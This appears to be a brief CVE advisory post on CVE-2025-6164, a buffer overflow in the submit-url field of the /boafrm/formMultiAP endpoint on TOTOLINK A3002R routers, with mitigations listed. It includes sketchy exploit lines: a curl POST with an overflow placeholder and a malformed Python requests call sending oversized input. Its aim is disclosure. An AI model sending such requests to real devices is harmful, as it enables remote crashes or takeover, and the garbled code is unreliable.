Listen to this Post
How the CVE Works
CVE-2025-6164 exploits a buffer overflow vulnerability in TOTOLINK A3002R firmware version 4.0.0-B20230531.1404. The flaw resides in the `/boafrm/formMultiAP` endpoint, which mishandles HTTP POST requests. By manipulating the `submit-url` argument, an attacker can overflow the buffer, leading to arbitrary code execution or system crashes. The attack is remotely exploitable, requiring no authentication. Publicly disclosed PoC exploits increase the risk of active exploitation.
DailyCVE Form
Platform: TOTOLINK A3002R
Version: 4.0.0-B20230531.1404
Vulnerability: Buffer Overflow
Severity: Critical
Date: 06/23/2025
Prediction: Patch by 07/15/2025
What Undercode Say
curl -X POST -d "submit-url=<OVERFLOW_PAYLOAD>" http://<TARGET_IP>/boafrm/formMultiAP
payload = "A" 1024 Example buffer overflow payload
requests.post(f"http://<TARGET_IP>/boafrm/formMultiAP", data={"submit-url": payload})
How Exploit
- Craft malicious HTTP POST request with oversized
submit-url. - Trigger buffer overflow for RCE or DoS.
- Use public PoC for reliable exploitation.
Protection from this CVE
- Apply vendor patch.
- Disable exposed endpoints.
- Use network segmentation.
Impact
- Remote code execution.
- System compromise.
- Unauthorized access.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
